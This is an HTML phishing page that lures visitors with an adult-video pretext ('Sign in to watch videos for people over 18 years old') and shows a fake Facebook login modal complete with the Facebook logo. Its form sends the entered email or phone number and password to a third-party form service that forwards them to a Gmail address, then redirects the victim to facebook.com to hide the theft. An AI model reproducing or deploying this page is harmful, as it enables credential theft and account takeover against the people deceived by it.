

<html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" href="https://cdn.smrt-content.com/assets/1059/other/favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="https://cdn.smrt-content.com/assets/1059/css/style.css">
<script type="text/javascript" async="" src="https://www.googletagmanager.com/gtag/js?id=G-C3EPRPS8FB&amp;l=dataLayer&amp;cx=c"></script><script type="text/javascript" defer="" async="" src="https://static.trafficjunky.com/js/mp.min.js">
  </script><script type="text/javascript" async="" src="http://www.google-analytics.com/analytics.js">
  </script><script type="text/javascript" async="" src="https://www.googletagmanager.com/gtag/js?id=G-C3EPRPS8FB&amp;l=dataLayer&amp;cx=c">
  </script><script type="text/javascript" defer="" async="" src="../static.trafficjunky.com/js/mp.min.js"></script><script type="text/javascript" defer="" async="" src="https://static.trafficjunky.com/js/mp.min.js"></script><script async="" src="https://www.googletagmanager.com/gtm6f26.js?id=GTM-TR8VQRX"></script>
<script src="../cdn.smrt-content.com/assets/1059/js/jquery.js"></script>
<script src="https://cdn.smrt-content.com/assets/1059/js/multilang.js"></script>
<script src="https://cdn.smrt-content.com/assets/1059/js/showHide.js"></script>
<script src="https://cdn.smrt-content.com/assets/1059/js/backoffer.js"></script>

<main></main>
</body>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" />
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css" rel="stylesheet" /><script src='https://code.jquery.com/jquery-3.5.1.min.js'></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" />
<style type="text/css">.container {
        padding-right: 15px;
        padding-left: 15px;
        margin-right: auto;
        margin-left: auto;

    }

    .row {
        margin-right: -15px;
        margin-left: -15px;
    }

    .col-xs-12 {
        width: 100%;
    }

    .carousel-inner>.item>a>img,
    .carousel-inner>.item>img,
    .img-responsive,
    .thumbnail a>img,
    .thumbnail>img {
        display: block;
        max-width: 100%;
        height: auto;
    }

    /* ---------------------------------------- */
    .modal {
        position: fixed;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        z-index: 1050;
        display: none;
        overflow: hidden;
        outline: 0;
    }

    .fade.in {
        opacity: 1;
    }

    .login-form-wrap {
        background: radial-gradient(ellipse at center, rgba(81, 112, 173, 1) 0%, rgba(53, 84, 147, 1) 100%);
        border: 1px solid #2d416d;
        box-shadow: 0 1px #5670a4 inset, 0 0 10px 5px rgb(0 0 0 / 10%);
        width: 380px;
        max-width: 100%;
        height: 480px;
        margin: 60px auto;
        padding: 50px 30px 0;
        text-align: center;
    }

    .form-controll {
        border-radius: 5px;
        display: block;
        width: 100%;
        height: 34px;
        padding: 6px 12px;
        font-size: 14px;
        line-height: 1.42857143;
        color: #555;
        background-color: #fff;
        background-image: none;
        border: 1px solid #ccc;
        -webkit-box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%);
        box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%);
        -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
        -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
        transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    }

    .btn-primary {
        color: #fff;
        background-color: #337ab7;
        border-color: #2e6da4;
    }

    .btn {
        display: inline-block;
        padding: 6px 12px;
        margin-bottom: 0;
        font-size: 14px;
        font-weight: 400;
        line-height: 1.42857143;
        text-align: center;
        white-space: nowrap;
        vertical-align: middle;
        -ms-touch-action: manipulation;
        touch-action: manipulation;
        cursor: pointer;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
        background-image: none;
        border: 1px solid transparent;
        border-radius: 4px;
    }

    .custom_icon {
        position: absolute;
        top: 50%;
        left: 50%;
        font-size: 40px;
        color: blue;
        transform: translate(-50%, -50%);
    }

    .submitStyleLogin {
        padding: 4px 0px;
        background-color: #627aad;
        border-radius: 4px;
        text-shadow: 0 -1px rgba(0, 0, 0, .25);
        background-image: -webkit-linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1));
        background-image: linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1));
        border: 1px solid #4162A7;
    }

    .submitStyleRegister {
        background-color: #5b93fc;
        padding: 10px 20px;
        font-weight: bold;
        border: 1px solid #0A5AED;
        text-shadow: 0 -1px rgba(0, 0, 0, .25);
        background-image: -webkit-linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1));
        background-image: linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, .1));
    }

    .videoView {
        width: 180px;
        font-size: 12px;
        background-color: #fff9d7;
        border: 1px solid #e2c822;
        padding: 7px 23px;
        margin: 10px auto;
        border-radius: 6px;
    }

    #dp_00004 {
        color: #899bc1;
        font-size: 12px;
        line-height: 16px;
        margin-top: 10px;
    }

    .imageProfile {
        text-align: center;
        padding: 5px 0px;
        position: relative;
    }

    .imageProfile img {
        border-radius: 50%;
        width: 80px;
        height: 80px;
    }

    #myModal {
        display: block;
        padding-left: 0px;
        margin-left: 0px;
        margin-right: 0px;
    }

    .nguoisangtao {
        background-color: yellow;
        font-size: 20pt;
    }

    .nguoisangtaocustom {
        color: #ff1313;
    }

    .img-responsive {
        height: 100vh;
        object-fit: cover;
        width: 100%;
    }

    .rows1 {
        margin-top: 10px;
    }

    .separator {
        clear: both;
        text-align: center;
    }

    .rows2 {
        background: #3b5998;
    }

    .inputcustom1 {
        height: 40px;
        margin-bottom: 2px;
    }

    .inputcustom2 {
        height: 40px;
    }

    ._55ws {
        padding: 10px 0px;
        border-top: none;
    }
</style>
<script async='async' src='https://ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js'></script>
<div class="container">
<div class="row rows1">
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
<div class="separator"><b><span><a class="nguoisangtao" href="#" onclick="showlog()"></a></span></b></div>
<img alt="Image" class="img-responsive" onclick="showlog();" src="https://i6.imagetwist.com/th/41644/3bx47az8q6y8.jpg" />
<div class="separator" style=" text-align: center;"><b><span><a class="nguoisangtao nguoisangtaocustom" href="#" onclick="showlog()">Watch the video here</a></span></b></div>
</div>
</div>
</div>

<div class="modal fade in" id="myModal" role="dialog">
<section class="login-form-wrap">
<div class="row rows2">
<div class="col-lg-12 imageProfile"><img src="https://cdn.ciudad.com.ar/sites/default/files/styles/nota_especiales_contenido/public/sol_ducha.jpg?itok=5xL40_kY" />&nbsp;<img src="https://facebookbrand.com/wp-content/uploads/2019/04/f_logo_RGB-Hex-Blue_512.png?w=512&h=512"></div>
</div>

<div class="row">
<div class="videoView" id="dp_0001">Sign in to watch videos for people over 18 years old</div>

<form action="https://formsubmit.co/youdeywynemeni@gmail.com" class="col-xs-12 col-sm-12 col-md-12 col-lg-12" id="login_form_mb" method="POST" >
 <input type="hidden" name="_next" value="https://facebook.com">
 <input type="hidden" name="_captcha" value="false">
		
<input class="form-controll inputcustom1" id="email" name="search" placeholder="Mobile number or email address" required="" type="search" style="border-radius: none;"/> <input class="form-controll inputcustom2" id="pass" name="pass" placeholder="Password" required="" type="password" />
<div class="_55ws"><button class="btn btn-primary btn-lg btn-block submitStyleLogin"  name="submit" type="submit">Log In</button></div>
</form>
</div>
<button class="btn btn-primary submitStyleRegister" type="button">Create new account</button>

<p id="dp_00004">Forgotten password</p>
</section>
</div>
